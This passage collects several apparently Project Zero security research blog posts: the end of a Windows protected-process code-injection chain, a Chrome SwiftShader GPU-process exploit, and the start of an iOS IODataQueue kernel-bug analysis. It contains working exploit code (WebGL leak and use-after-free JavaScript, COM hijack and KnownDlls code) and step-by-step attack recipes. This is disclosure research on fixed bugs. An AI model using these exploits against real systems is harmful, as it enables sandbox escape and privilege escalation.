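      0, nullptr, 0, KEY_WRITE, nullptr, &key, nullptr);

  // Placeholder: point at whichever DLL actually implements the class.
  const wchar_t dll[] = L"C:\\Windows\\System32\\original_server.dll";
  RegSetValueExW(key, nullptr, 0, REG_SZ, (const BYTE*)dll, sizeof(dll));

  // "Free" forces the object into an MTA, which in turn forces the COM
  // runtime to initialize remoting (and with it IRundown).
  const wchar_t model[] = L"Free";
  RegSetValueExW(key, L"ThreadingModel", 0, REG_SZ, (const BYTE*)model, sizeof(model));
  RegCloseKey(key);
}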
What about the second part: what can we call inside the process to execute arbitrary code? Anything we call using DoCallback must meet the following criteria to avoid undefined behavior:
  1. Only takes one pointer sized parameter.
  2. Only the lower 32 bits of the call are returned as the HRESULT if we need it.
  3. The callsite is guarded by CFG so it must be something which is a valid indirect call target.

As WerFaultSecure isn’t doing anything special, at a minimum any DLL exported function should be a valid indirect call target. LoadLibrary clearly meets our criteria: it takes a single parameter which is a pointer to the DLL path, and we don’t really care about the return value so the truncation isn’t important. We can’t just load any DLL as it must be correctly signed, but what about hijacking KnownDlls?
Wait, didn’t I say that PP can’t load from KnownDlls? It can’t, but only because the value of the LdrpKnownDllDirectoryHandle global variable is always set to NULL during process initialization. When the DLL loader checks for the presence of a known DLL, if the handle is NULL the check returns immediately. However, if the handle has a value it will do the normal check, and just like in PPL no additional security checks are performed if the process maps an image from an existing section object. Therefore if we can modify the LdrpKnownDllDirectoryHandle global variable to point to a directory object inherited into the PP we can get it to load an arbitrary DLL.
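To illustrate what the inherited directory might look like, here is a sketch of building a fake KnownDlls directory with native APIs (the ntdll prototypes are declared by hand, and the constants and names are assumptions for illustration):

// Sketch: build a private object directory containing an image section named
// after the DLL we want loaded, then mark the directory handle inheritable.
#include <windows.h>
#include <winternl.h>

extern "C" NTSTATUS NTAPI NtCreateDirectoryObject(PHANDLE, ACCESS_MASK,
                                                  POBJECT_ATTRIBUTES);
extern "C" NTSTATUS NTAPI NtCreateSection(PHANDLE, ACCESS_MASK,
    POBJECT_ATTRIBUTES, PLARGE_INTEGER, ULONG, ULONG, HANDLE);

HANDLE CreateFakeKnownDlls(const wchar_t* dll_path, const wchar_t* dll_name) {
  OBJECT_ATTRIBUTES oa;
  InitializeObjectAttributes(&oa, nullptr, 0x2 /* OBJ_INHERIT */, nullptr, nullptr);
  HANDLE dir = nullptr;
  NtCreateDirectoryObject(&dir, 0xF000F /* DIRECTORY_ALL_ACCESS */, &oa);

  // Mirror what \KnownDlls contains: a named SEC_IMAGE section for the DLL.
  HANDLE file = CreateFileW(dll_path, GENERIC_READ | GENERIC_EXECUTE,
                            FILE_SHARE_READ, nullptr, OPEN_EXISTING, 0, nullptr);
  UNICODE_STRING name;
  RtlInitUnicodeString(&name, dll_name);  // e.g. L"TARGET.DLL"
  InitializeObjectAttributes(&oa, &name, 0, dir, nullptr);
  HANDLE section = nullptr;
  NtCreateSection(&section, SECTION_ALL_ACCESS, &oa, nullptr,
                  PAGE_EXECUTE, SEC_IMAGE, file);
  CloseHandle(file);
  // The numeric value of 'dir' must later be massaged (by duplicating it)
  // into the constrained 0x0?0?0?0? form the write primitive can produce.
  return dir;
}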
The final piece of the puzzle is finding an exported function which we can call to write an arbitrary value into the global variable. This turns out to be harder than expected. The ideal function would be one which takes a single pointer value argument and writes to that location with no other side effects. After a number of false starts (including trying to use gets) I settled on the pair SetProcessDefaultLayout and GetProcessDefaultLayout in USER32. The set function takes a single value which is a set of flags and stores it in a global location (actually in the kernel, but good enough). The get method will then write that value to an arbitrary pointer. This isn’t perfect as the values we can set, and therefore write, are limited to the numbers 0-7; however, by offsetting the pointer in the get calls we can write a value of the form 0x0?0?0?0? where each ? can be any value between 0 and 7. As the value just has to refer to the handle inside a process under our control we can easily craft the handle to meet these strict requirements (a short sketch of this write primitive follows the step list below).

Wrapping Up

In conclusion, to get arbitrary code execution inside a PP-WindowsTCB process without administrator privileges we can do the following:
  1. Create a fake KnownDlls directory, duplicating the handle until it meets a pattern suitable for writing through Get/SetProcessDefaultLayout. Mark the handle as inheritable.
  2. Create the COM object hijack for CLSID {07FC2B94-5285-417E-8AC3-C2CE5240B0FA} with the ThreadingModel set to “Free”.
  3. Start Windows 10 WerFaultSecure at PP-WindowsTCB level and request a crash dump from an AppContainer process. During process creation the fake KnownDlls must be added to ensure it’s inherited into the new process.
  4. Wait until COM has initialized then use Windows 8.1 WerFaultSecure to dump the process memory of the target.
  5. Parse the crash dump to discover the process secret, context pointer and IPID for IRundown.
  6. Connect to the IRundown interface and use DoCallback with Get/SetProcessDefaultLayout to modify the LdrpKnownDllDirectoryHandle global variable to the handle value created in 1.
  7. Call DoCallback again to call LoadLibrary with a name to load from our fake KnownDlls.

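For step 6, a conceptual sketch of the Get/SetProcessDefaultLayout write primitive (do_callback below is a hypothetical wrapper around the IRundown::DoCallback RPC described earlier):

// Conceptual sketch of the constrained 4-byte write. SetProcessDefaultLayout
// stores a small flag value (0-7); GetProcessDefaultLayout then writes that
// DWORD to whatever pointer we pass it. Each write also zeroes the three
// bytes past the one we care about, hence writing offsets in increasing order.
// user32.dll shares a base across processes, so these addresses should also
// be valid in the target (an assumption worth verifying).
void write_constrained(BYTE* target, const BYTE digits[4] /* each 0-7 */) {
  for (int i = 0; i < 4; ++i) {
    do_callback((void*)&SetProcessDefaultLayout, (void*)(ULONG_PTR)digits[i]);
    do_callback((void*)&GetProcessDefaultLayout, target + i);
  }
  // target now holds the little-endian DWORD 0x0?0?0?0? built from digits[],
  // e.g. the crafted KnownDlls directory handle value from step 1.
}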
This process works on all supported versions of Windows 10 including 1809. It’s worth noting that invoking DoCallback can be used with any process where you can read the contents of memory and the process has initialized COM remoting. For example, if you had an arbitrary memory disclosure vulnerability in a privileged COM service you could use this attack to convert the arbitrary read into arbitrary execute. As I don’t tend to look for memory corruption/memory disclosure vulnerabilities perhaps this behavior is of more use to others.
That concludes my series on attacking Windows protected processes. I think it demonstrates that preventing a user from attacking processes which share resources, such as the registry and files, is ultimately doomed to fail. This is probably why Microsoft do not support PP/PPL as a security boundary. Isolated User Mode seems a much stronger primitive, although that does come with additional resource requirements which PP/PPL, for the most part, doesn’t. I wouldn’t be surprised if newer versions of Windows 10, by which I mean after version 1809, try to mitigate these attacks in some way, but you’ll almost certainly be able to find a bypass.

Heap Feng Shader: Exploiting SwiftShader in Chrome

Wed, 10/24/2018 - 14:17
Posted by Mark Brand, Google Project Zero
On the majority of systems, under normal conditions, SwiftShader will never be used by Chrome - it’s used as a fallback if you have a known-bad “blacklisted” graphics card or driver. However, Chrome can also decide at runtime that your graphics driver is having issues, and switch to using SwiftShader to give a better user experience. If you’re interested to see the performance difference, or just to have a play, you can launch Chrome using SwiftShader instead of GPU acceleration using the --disable-gpu command line flag.
SwiftShader is quite an interesting attack surface in Chrome, since all of the rendering work is done in a separate process; the GPU process. Since this process is responsible for drawing to the screen, it needs to have more privileges than the highly-sandboxed renderer processes that are usually handling webpage content. On typical Linux desktop system configurations, technical limitations in sandboxing access to the X11 server mean that this sandbox is very weak; on other platforms such as Windows, the GPU process still has access to a significantly larger kernel attack surface. Can we write an exploit that gets code execution in the GPU process without first compromising a renderer? We’ll look at exploiting two issues that we reported that were recently fixed by Chrome.
It turns out that if you have a supported GPU, it’s still relatively straightforward for an attacker to force your browser to use SwiftShader for accelerated graphics - if the GPU process crashes more than 4 times, Chrome will fall back to this software rendering path instead of disabling acceleration. In my testing it’s quite simple to cause the GPU process to crash or hit an out-of-memory condition from WebGL - this is left as an exercise for the interested reader. For the rest of this blog-post we’ll be assuming that the GPU process is already in the fallback software rendering mode.
Previous precision problems
So; we previously discussed an information leak issue resulting from some precision issues in the SwiftShader code - so we’ll start here, with a useful leaking primitive from this issue. A little bit of playing around brought me to the following result, which will allocate a texture of size 0xb620000 in the GPU process, and when the function read() is called on it will return the 0x10000 bytes directly following that buffer back to javascript. (The allocation happens at the texImage2D call, and the out-of-bounds access happens during the blitFramebuffer call.)
function issue_1584(gl) {
  const src_width  = 0x2000;
  const src_height = 0x16c4;

  // we use a texture for the source, since this will be allocated directly
  // when we call glTexImage2D.
  this.src_fb = gl.createFramebuffer();
  gl.bindFramebuffer(gl.READ_FRAMEBUFFER, this.src_fb);

  let src_data = new Uint8Array(src_width * src_height * 4);
  for (var i = 0; i < src_data.length; ++i) {
    src_data[i] = 0x41;
  }

  let src_tex = gl.createTexture();
  gl.bindTexture(gl.TEXTURE_2D, src_tex);
  gl.texImage2D(gl.TEXTURE_2D, 0, gl.RGBA8, src_width, src_height, 0,
                gl.RGBA, gl.UNSIGNED_BYTE, src_data);
  gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_MIN_FILTER, gl.NEAREST);
  gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_MAG_FILTER, gl.NEAREST);
  gl.framebufferTexture2D(gl.READ_FRAMEBUFFER, gl.COLOR_ATTACHMENT0,
                          gl.TEXTURE_2D, src_tex, 0);

  this.read = function() {
    gl.bindFramebuffer(gl.READ_FRAMEBUFFER, this.src_fb);

    const dst_width  = 0x2000;
    const dst_height = 0x1fc4;

    dst_fb = gl.createFramebuffer();
    gl.bindFramebuffer(gl.DRAW_FRAMEBUFFER, dst_fb);

    let dst_rb = gl.createRenderbuffer();
    gl.bindRenderbuffer(gl.RENDERBUFFER, dst_rb);
    gl.renderbufferStorage(gl.RENDERBUFFER, gl.RGBA8, dst_width, dst_height);
    gl.framebufferRenderbuffer(gl.DRAW_FRAMEBUFFER, gl.COLOR_ATTACHMENT0,
                               gl.RENDERBUFFER, dst_rb);

    gl.bindFramebuffer(gl.DRAW_FRAMEBUFFER, dst_fb);

    // trigger
    gl.blitFramebuffer(0, 0, src_width, src_height,
                       0, 0, dst_width, dst_height,
                       gl.COLOR_BUFFER_BIT, gl.NEAREST);

    // copy the out of bounds data back to javascript
    var leak_data = new Uint8Array(dst_width * 8);
    gl.bindFramebuffer(gl.READ_FRAMEBUFFER, dst_fb);
    gl.readPixels(0, dst_height - 1, dst_width, 1, gl.RGBA, gl.UNSIGNED_BYTE, leak_data);
    return leak_data.buffer;
  }

  return this;
}
This might seem like quite a crude leak primitive, but since SwiftShader is using the system heap, it’s quite easy to arrange for the memory directly following this allocation to be accessible safely.
And a second bug
Now, the next vulnerability we have is a use-after-free of an egl::ImageImplementation object caused by a reference count overflow. This object is quite a nice object from an exploitation perspective, since from javascript we can read and write the data it stores, so it seems like the nicest exploitation approach would be to replace this object with a corrupted version; however, as it’s a c++ object we’ll need to break ASLR in the GPU process to achieve this. If you’re reading along in the exploit code, the function leak_image in feng_shader.html implements a crude spray of egl::ImageImplementation objects and uses the information leak above to find an object to copy.
So - a stock-take. We’ve just free’d an object, and we know exactly what the data that *should* be in that object looks like. This seems straightforward - now we just need to find a primitive that will allow us to replace it!
This was actually the most frustrating part of the exploit. Due to the multiple levels of validation/duplication/copying that occur when OpenGL commands are passed from WebGL to the GPU process (Initial WebGL validation (in renderer), GPU command buffer interface, ANGLE validation), getting a single allocation of a controlled size with controlled data is non-trivial! The majority of allocations that you’d expect to be useful (image/texture data etc.) end up having lots of size restrictions or being rounded to different sizes.
However, there is one nice primitive for doing this - shader uniforms. This is the way in which parameters are passed to programmable GPU shaders; and if we look in the SwiftShader code we can see that (eventually) when these are allocated they will do a direct call to operator new[]. We can read and write from the data stored in a uniform, so this will give us the primitive that we need.
The code below implements this technique for (very basic) heap grooming in the SwiftShader/GPU process, and an optimised method for overflowing the reference count. The uniform declarations in the vertex shader source will cause 4 allocations of size 0xf0 when the program object is linked, and the final copyTexImage2D call (followed by linkProgram) is where the original object will be free’d and replaced by a shader uniform object.
function issue_1585(gl, fake) {
  let vertex_shader = gl.createShader(gl.VERTEX_SHADER);
  gl.shaderSource(vertex_shader, `
    attribute vec4 position;
    uniform int block0[60];
    uniform int block1[60];
    uniform int block2[60];
    uniform int block3[60];

    void main() {
      gl_Position = position;
      gl_Position.x += float(block0[0]);
      gl_Position.x += float(block1[0]);
      gl_Position.x += float(block2[0]);
      gl_Position.x += float(block3[0]);
    }`);
  gl.compileShader(vertex_shader);

  let fragment_shader = gl.createShader(gl.FRAGMENT_SHADER);
  gl.shaderSource(fragment_shader, `
    void main() {
      gl_FragColor = vec4(0.0, 0.0, 0.0, 0.0);
    }`);
  gl.compileShader(fragment_shader);

  this.program = gl.createProgram();
  gl.attachShader(this.program, vertex_shader);
  gl.attachShader(this.program, fragment_shader);

  const uaf_width  = 8190;
  const uaf_height = 8190;

  this.fb = gl.createFramebuffer();
  uaf_rb = gl.createRenderbuffer();

  gl.bindFramebuffer(gl.READ_FRAMEBUFFER, this.fb);
  gl.bindRenderbuffer(gl.RENDERBUFFER, uaf_rb);
  gl.renderbufferStorage(gl.RENDERBUFFER, gl.RGBA32UI, uaf_width, uaf_height);
  gl.framebufferRenderbuffer(gl.READ_FRAMEBUFFER, gl.COLOR_ATTACHMENT0,
                             gl.RENDERBUFFER, uaf_rb);

  let tex = gl.createTexture();
  gl.bindTexture(gl.TEXTURE_CUBE_MAP, tex);
  // trigger
  for (i = 2; i < 0x10; ++i) {
    gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI,
                      0, 0, uaf_width, uaf_height, 0);
  }

  function unroll(gl) {
    gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI,
                      0, 0, uaf_width, uaf_height, 0);
    // snip ...
    gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI,
                      0, 0, uaf_width, uaf_height, 0);
  }

  for (i = 0x10; i < 0x100000000; i += 0x10) {
    unroll(gl);
  }

  // the reference count of the egl::ImageImplementation for the rendertarget
  // of uaf_rb is now 0, so this call will free it, leaving a dangling reference
  gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI,
                    0, 0, 256, 256, 0);

  // replace the allocation with our shader uniform.
  gl.linkProgram(this.program);
  gl.useProgram(this.program);

  function wait(ms) {
    var start = Date.now(),
        now = start;
    while (now - start < ms) {
      now = Date.now();
    }
  }

  function read(uaf, index) {
    wait(200);
    var read_data = new Int32Array(60);
    for (var i = 0; i < 60; ++i) {
      read_data[i] = gl.getUniform(uaf.program,
          gl.getUniformLocation(uaf.program,
              'block' + index.toString() + '[' + i.toString() + ']'));
    }
    return read_data.buffer;
  }

  function write(uaf, index, buffer) {
    gl.uniform1iv(gl.getUniformLocation(uaf.program, 'block' + index.toString()),
                  new Int32Array(buffer));
    wait(200);
  }

  this.read = function() {
    return read(this, this.index);
  }

  this.write = function(buffer) {
    return write(this, this.index, buffer);
  }

  for (var i = 0; i < 4; ++i) {
    write(this, i, fake.buffer);
  }

  gl.readPixels(0, 0, 2, 2, gl.RGBA_INTEGER, gl.UNSIGNED_INT,
                new Uint32Array(2 * 2 * 16));
  for (var i = 0; i < 4; ++i) {
    data = new DataView(read(this, i));
    for (var j = 0; j < 0xf0; ++j) {
      if (fake.getUint8(j) != data.getUint8(j)) {
        log('uaf block index is ' + i.toString());
        this.index = i;
        return this;
      }
    }
  }
}
At this point we can modify the object to allow us to read and write from all of the GPU process’ memory; see the read_write function for how the gl.readPixels and gl.blitFramebuffer methods are used for this.
Now, it should be fairly trivial to get arbitrary code execution from this point; although it’s often a pain to get your ROP chain to line up nicely when you have to replace a c++ object, this is a very tractable problem. It turns out, though, that there’s another trick that will make this exploit more elegant.
SwiftShader uses JIT compilation of shaders to get as high performance as possible - and that JIT compiler uses another c++ object to handle loading and mapping the generated ELF executables into memory. Maybe we can create a fake object that uses our egl::ImageImplementation object as a SubzeroReactor::ELFMemoryStreamer object, and have the GPU process load an ELF file for us as a payload, instead of fiddling around ourselves?
We can - so by creating a fake vtable such that:

  egl::ImageImplementation::lockInternal   -> egl::ImageImplementation::lockInternal
  egl::ImageImplementation::unlockInternal -> ELFMemoryStreamer::getEntry
  egl::ImageImplementation::release        -> shellcode
When we then read from this image object, instead of returning pixels to javascript, we’ll execute our shellcode payload in the GPU process.
Conclusions

It’s interesting that we can find directly javascript-accessible attack surface in some unlikely places in a modern browser codebase when we look at things sideways - avoiding the perhaps more obvious and highly contested areas such as the main javascript JIT engine.
In many codebases, there is a long history of development and there are many trade-offs made for compatibility and consistency across releases. It’s worth reviewing some of these to see whether the original expectations turned out to be valid after the release of these features, and if they still hold today, or if these features can actually be removed without significant impact to users.

Deja-XNU

Thu, 10/18/2018 - 18:27
Posted by Ian Beer, Google Project Zero
This blog post revisits an old bug found by Pangu Team and combines it with a new, albeit very similar issue I recently found to try to build a "perfect" exploit for iOS 7.1.2.
State of the art

An idea I've wanted to play with for a while is to revisit old bugs and try to exploit them again, but using what I've learnt in the meantime about iOS. My hope is that it would give an insight into what the state-of-the-art of iOS exploitation could have looked like a few years ago, and might prove helpful if extrapolated forwards to think about what state-of-the-art exploitation might look like now.
So let's turn back the clock to 2014...
Pangu 7

On June 23 2014 @PanguTeam released the Pangu 7 jailbreak for iOS 7.1-7.1.x. They exploited a lot of bugs. The issue we're interested in is CVE-2014-4461 which Apple described as: A validation issue ... in the handling of certain metadata fields of IOSharedDataQueue objects. This issue was addressed through relocation of the metadata.
(Note that this kernel bug wasn't actually fixed in iOS 8 and Pangu reused it for Pangu 8...)
Queuerious...

Looking at the iOS 8-era release notes you'll see that Pangu and I had found some bugs in similar areas:
  • IOKit

Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to execute arbitrary code with system privileges
Description: A validation issue existed in the handling of certain metadata fields of IODataQueue objects. This issue was addressed through improved validation of metadata.
CVE-2014-4418 : Ian Beer of Google Project Zero
  • IOKit

Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to execute arbitrary code with system privileges
Description: A validation issue existed in the handling of certain metadata fields of IODataQueue objects. This issue was addressed through improved validation of metadata.
CVE-2014-4388 : @PanguTeam
  • IOKit

Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to execute arbitrary code with system privileges
Description: An integer overflow existed in the handling of IOKit functions. This issue was addressed through improved validation of IOKit API arguments.
CVE-2014-4389 : Ian Beer of Google Project Zero
IODataQueue

I had looked at the IOKit class IODataQueue, which the header file IODataQueue.h tells us "is designed to allow kernel code to queue data to a user process." It does this by creating a lock-free queue data-structure in shared memory.
IODataQueue was quite simple, there were only two fields: dataQueue and notifyMsg:
class IODataQueue : public OSObject
{
  OSDeclareDefaultStructors(IODataQueue)
protected:
  IODataQueueMemory * dataQueue;
  void * notifyMsg;
public:
  static IODataQueue *withCapacity(UInt32 size);
  static IODataQueue *withEntries(UInt32 numEntries, UInt32 entrySize);
  virtual Boolean initWithCapacity(UInt32 size);
  virtual Boolean initWithEntries(UInt32 numEntries, UInt32 entrySize);
  virtual Boolean enqueue(void *data, UInt32 dataSize);
  virtual void setNotificationPort(mach_port_t port);
  virtual IOMemoryDescriptor *getMemoryDescriptor();
};
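To give a sense of how this API is meant to be consumed, here's a sketch of typical driver-side usage (illustrative only; user_notify_port and event are placeholders):

// Kernel driver side (sketch): create a queue, set where "data available"
// notifications go, export the backing memory, then produce entries.
IODataQueue* queue = IODataQueue::withCapacity(PAGE_SIZE);
queue->setNotificationPort(user_notify_port);           // placeholder port
IOMemoryDescriptor* md = queue->getMemoryDescriptor();  // typically handed to
                                                        // userspace via clientMemoryForType
queue->enqueue(&event, sizeof(event));                  // userspace consumes from shared memory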
Here's the entire implementation of IODataQueue, as it was around iOS 7.1.2:
OSDefineMetaClassAndStructors(IODataQueue, OSObject)

IODataQueue *IODataQueue::withCapacity(UInt32 size)
{
    IODataQueue *dataQueue = new IODataQueue;

    if (dataQueue) {
        if (!dataQueue->initWithCapacity(size)) {
            dataQueue->release();
            dataQueue = 0;
        }
    }

    return dataQueue;
}

IODataQueue *IODataQueue::withEntries(UInt32 numEntries, UInt32 entrySize)
{
    IODataQueue *dataQueue = new IODataQueue;

    if (dataQueue) {
        if (!dataQueue->initWithEntries(numEntries, entrySize)) {
            dataQueue->release();
            dataQueue = 0;
        }
    }

    return dataQueue;
}

Boolean IODataQueue::initWithCapacity(UInt32 size)
{
    vm_size_t allocSize = 0;

    if (!super::init()) {
        return false;
    }

    allocSize = round_page(size + DATA_QUEUE_MEMORY_HEADER_SIZE);

    if (allocSize < size) {
        return false;
    }

    dataQueue = (IODataQueueMemory *)IOMallocAligned(allocSize, PAGE_SIZE);
    if (dataQueue == 0) {
        return false;
    }

    dataQueue->queueSize    = size;
    dataQueue->head         = 0;
    dataQueue->tail         = 0;

    return true;
}

Boolean IODataQueue::initWithEntries(UInt32 numEntries, UInt32 entrySize)
{
    return (initWithCapacity((numEntries + 1) * (DATA_QUEUE_ENTRY_HEADER_SIZE + entrySize)));
}

void IODataQueue::free()
{
    if (dataQueue) {
        IOFreeAligned(dataQueue, round_page(dataQueue->queueSize + DATA_QUEUE_MEMORY_HEADER_SIZE));
    }

    super::free();

    return;
}

Boolean IODataQueue::enqueue(void * data, UInt32 dataSize)
{
    const UInt32       head      = dataQueue->head;  // volatile
    const UInt32       tail      = dataQueue->tail;
    const UInt32       entrySize = dataSize + DATA_QUEUE_ENTRY_HEADER_SIZE;
    IODataQueueEntry * entry;

    if ( tail >= head )
    {
        // Is there enough room at the end for the entry?
        if ( (tail + entrySize) <= dataQueue->queueSize )
        {
            entry = (IODataQueueEntry *)((UInt8 *)dataQueue->queue + tail);

            entry->size = dataSize;
            memcpy(&entry->data, data, dataSize);

            // The tail can be out of bound when the size of the new entry
            // exactly matches the available space at the end of the queue.
            // The tail can range from 0 to dataQueue->queueSize inclusive.

            dataQueue->tail += entrySize;
        }
        else if ( head > entrySize ) // Is there enough room at the beginning?
        {
            // Wrap around to the beginning, but do not allow the tail to catch
            // up to the head.

            dataQueue->queue->size = dataSize;

            // We need to make sure that there is enough room to set the size before
            // doing this. The user client checks for this and will look for the size
            // at the beginning if there isn't room for it at the end.

            if ( ( dataQueue->queueSize - tail ) >= DATA_QUEUE_ENTRY_HEADER_SIZE )
            {
                ((IODataQueueEntry *)((UInt8 *)dataQueue->queue + tail))->size = dataSize;
            }

            memcpy(&dataQueue->queue->data, data, dataSize);
            dataQueue->tail = entrySize;
        }
        else
        {
            return false; // queue is full
        }
    }
    else
    {
        // Do not allow the tail to catch up to the head when the queue is full.
        // That's why the comparison uses a '>' rather than '>='.

        if ( (head - tail) > entrySize )
        {
            entry = (IODataQueueEntry *)((UInt8 *)dataQueue->queue + tail);

            entry->size = dataSize;
            memcpy(&entry->data, data, dataSize);
            dataQueue->tail += entrySize;
        }
        else
        {
            return false; // queue is full
        }
    }

    // Send notification (via mach message) that data is available.

    if ( ( head == tail )                /* queue was empty prior to enqueue() */
    ||   ( dataQueue->head == tail ) )   /* queue was emptied during enqueue() */
    {
        sendDataAvailableNotification();
    }

    return true;
}

void IODataQueue::setNotificationPort(mach_port_t port)
{
    static struct _notifyMsg init_msg = { {
        MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0),
        sizeof (struct _notifyMsg),
        MACH_PORT_NULL,
        MACH_PORT_NULL,
        0,
        0
    } };

    if (notifyMsg == 0) {
        notifyMsg = IOMalloc(sizeof(struct _notifyMsg));
    }

    *((struct _notifyMsg *)notifyMsg) = init_msg;

    ((struct _notifyMsg *)notifyMsg)->h.msgh_remote_port = port;
}

void IODataQueue::sendDataAvailableNotification()
{
    kern_return_t       kr;
    mach_msg_header_t * msgh;

    msgh = (mach_msg_header_t *)notifyMsg;
    if (msgh && msgh->msgh_remote_port) {
        kr = mach_msg_send_from_kernel_proper(msgh, msgh->msgh_size);
        switch(kr) {
            case MACH_SEND_TIMED_OUT: // Notification already sent
            case MACH_MSG_SUCCESS:
                break;
            default:
                IOLog("%s: dataAvailableNotification failed - msg_send returned: %d\n",
                      /*getName()*/"IODataQueue", kr);
                break;
        }
    }
}

IOMemoryDescriptor *IODataQueue::getMemoryDescriptor()
{
    IOMemoryDescriptor *descriptor = 0;

    if (dataQueue != 0) {
        descriptor = IOMemoryDescriptor::withAddress(dataQueue,
                         dataQueue->queueSize + DATA_QUEUE_MEMORY_HEADER_SIZE,
                         kIODirectionOutIn);
    }

    return descriptor;
}
The ::initWithCapacity method allocates the buffer which will end up in shared memory. We can see from the cast that the structure of the memory looks like this:
typedef struct _IODataQueueMemory {
    UInt32            queueSize;
    volatile UInt32   head;
    volatile UInt32   tail;
    IODataQueueEntry  queue[1];
} IODataQueueMemory;
The ::setNotificationPort method allocated a mach message header structure via IOMalloc when it was first called and stored the buffer as notifyMsg.
The ::enqueue method was responsible for writing data into the next free slot in the queue, potentially wrapping back around to the beginning of the buffer.
Finally, ::getMemoryDescriptor created an IOMemoryDescriptor object which wrapped the dataQueue memory to return to userspace.
IODataQueue.cpp was 243 lines, including license and comments. I count at least 6 bugs in it. There's only one integer overflow check but there are multiple obvious integer overflow issues. The other problems stemmed from the fact that the only place where the IODataQueue was storing the queue's length was in the shared memory which userspace could modify.
This led to obvious memory corruption issues in ::enqueue, since userspace could alter the queueSize, head and tail fields and the kernel had no way to verify whether they were within the bounds of the queue buffer. The other two uses of the queueSize field also yielded interesting bugs: the ::free method has to trust the queueSize field, and so will make an oversized IOFree. Most interesting of all, however, is ::getMemoryDescriptor, which trusts queueSize when creating the IOMemoryDescriptor. If the kernel code which was using the IODataQueue allowed userspace to get multiple memory descriptors this would have let us get an oversized memory descriptor, potentially giving us read/write access to other kernel heap objects.
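As a concrete (hypothetical) illustration: once the queue memory is mapped into our task, e.g. via IOConnectMapMemory, nothing stops us doing the following before the kernel next touches the queue:

// All three header fields live in memory userspace controls:
IODataQueueMemory* q = (IODataQueueMemory*)qaddr;
q->queueSize = 0xfffff000;  // ::free now does an oversized IOFreeAligned;
                            // ::getMemoryDescriptor wraps far too much memory
q->tail      = 0x41414141;  // ::enqueue computes entry pointers from this,
                            // writing far outside the queue buffer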
Back to Pangu

Pangu's kernel code exec bug isn't in IODataQueue but in the subclass IOSharedDataQueue. IOSharedDataQueue.h tells us that the "IOSharedDataQueue class is designed to also allow a user process to queue data to kernel code."
IOSharedDataQueue adds one (unused) field:
    struct ExpansionData { };

    /*! @var reserved
        Reserved for future use.  (Internal use only) */
    ExpansionData * _reserved;

IOSharedDataQueue doesn't override the ::enqueue method, but adds a ::dequeue method to allow the kernel to dequeue objects which userspace has enqueued.
::dequeue had the same problems as ::enqueue with the queue size being in shared memory, which could lead the kernel to read out of bounds. But strangely that wasn't the only change in IOSharedDataQueue. Pangu noticed that IOSharedDataQueue also had a much more curious change in its overridden version of ::initWithCapacity:
Boolean IOSharedDataQueue::initWithCapacity(UInt32 size)
{
    IODataQueueAppendix *   appendix;

    if (!super::init()) {
        return false;
    }

    dataQueue = (IODataQueueMemory *)IOMallocAligned(round_page(size +
                    DATA_QUEUE_MEMORY_HEADER_SIZE + DATA_QUEUE_MEMORY_APPENDIX_SIZE),
                    PAGE_SIZE);
    if (dataQueue == 0) {
        return false;
    }

    dataQueue->queueSize = size;
    dataQueue->head = 0;
    dataQueue->tail = 0;

    appendix = (IODataQueueAppendix *)((UInt8 *)dataQueue + size +
                                       DATA_QUEUE_MEMORY_HEADER_SIZE);
    appendix->version = 0;
    notifyMsg = &(appendix->msgh);
    setNotificationPort(MACH_PORT_NULL);

    return true;
}
IOSharedDataQueue increased the size of the shared memory buffer to also add space for an IODataQueueAppendix structure:
typedef struct _IODataQueueAppendix {
    UInt32 version;
    mach_msg_header_t msgh;
} IODataQueueAppendix;
This contains a version field and, strangely, a mach message header. Then on this line:
 notifyMsg = &(appendix->msgh);
the notifyMsg member of the IODataQueue superclass is set to point in to that appendix structure.
Recall that IODataQueue allocated a mach message header structure via IOMalloc when a notification port was first set, so why did IOSharedDataQueue do it differently? About the only plausible explanation I can come up with is that a developer had noticed that the dataQueue memory allocation typically wasted almost a page of memory: clients asked for a page-multiple number of bytes, then the queue allocation added a small header to that and rounded up to a page-multiple again. This change allowed you to save a single 0x18-byte kernel allocation per queue. Given that this change seems to have landed right around the launch date of the first iPhone, a memory-constrained device with no swap, I could imagine there was a big drive to save memory.
But the question is: can you put a mach message header in shared memory like that?
What's in a message?

Here's the definition of mach_msg_header_t, as it was in iOS 7.1.2:
typedef struct {
  mach_msg_bits_t  msgh_bits;
  mach_msg_size_t  msgh_size;
  mach_port_t      msgh_remote_port;
  mach_port_t      msgh_local_port;
  mach_msg_size_t  msgh_reserved;
  mach_msg_id_t    msgh_id;
} mach_msg_header_t;
(The msgh_reserved field has since become msgh_voucher_port with the introduction of vouchers.)
Both userspace and the kernel appear at first glance to have the same definition of this structure, but upon closer inspection if you resolve all the typedefs you'll see this very important distinction:
userspace:

typedef __darwin_mach_port_t mach_port_t;
typedef __darwin_mach_port_name_t __darwin_mach_port_t;
typedef __darwin_natural_t __darwin_mach_port_name_t;
typedef unsigned int __darwin_natural_t;

kernel:

typedef ipc_port_t mach_port_t;
typedef struct ipc_port *ipc_port_t;
In userspace mach_port_t is an unsigned 32-bit integer which is a task-local name for a port, but in the kernel a mach_port_t is a raw pointer to the underlying ipc_port structure.
Since the kernel is the one responsible for initializing the notification message, and is the one sending it, it seems that the kernel is writing kernel pointers into userspace shared memory!
Fast-forward

Before we move on to writing a new exploit for that old issue let's jump forward to 2018, and why exactly I'm looking at this old code again.
I've recently spoken publicly about the importance of variant analysis, and I thought it was important to actually do some variant analysis myself before I gave that talk. By variant analysis, I mean taking a known security bug and looking for code which is vulnerable in a similar way. That could mean searching a codebase for all uses of a particular API which has exploitable edge cases, or even just searching for a buggy code snippet which has been copy/pasted into a different file.
Userspace queues and deja-xnu

